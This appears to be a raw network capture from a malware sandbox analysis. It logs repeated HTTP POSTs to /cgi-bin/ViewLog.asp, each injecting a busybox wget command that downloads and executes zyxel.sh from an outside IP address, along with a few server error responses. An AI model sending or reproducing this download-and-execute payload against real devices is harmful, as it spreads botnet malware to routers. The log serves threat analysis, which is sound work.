                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:36.389420033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        716192.168.2.144039631.136.214.2218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:35.989588022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:39.205379963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.349097013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:57.380501032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:22.211447001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:11.361562967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        717192.168.2.143548431.136.16.1788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:35.990086079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:39.205369949 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.349117041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:57.380481958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:22.211452961 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:11.361727953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        718192.168.2.143603095.88.156.2128080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:36.008785009 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:36.248389006 CET626INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 431
                                                        Date: Wed, 14 Feb 2024 08:34:35 GMT
                                                        Keep-Alive: timeout=5
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        719192.168.2.144577031.130.38.758080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:36.016540051 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        720192.168.2.143434085.237.180.878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:36.024821997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:36.274225950 CET376INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 09:34:34 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        721192.168.2.145485462.28.117.1758080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:36.285449982 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:36.501559973 CET312INHTTP/1.1 405 Not Allowed
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:32:37 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        722192.168.2.145137631.200.60.488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:36.317436934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        723192.168.2.145689294.123.113.408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:36.319065094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        724192.168.2.145193885.13.78.428080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:36.444758892 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:36.665524960 CET498INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:36 GMT
                                                        Server: Apache/2.4.56 (Debian)
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        725192.168.2.145199031.136.84.2098080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:37.224217892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:40.229232073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:46.372997046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:58.404417038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
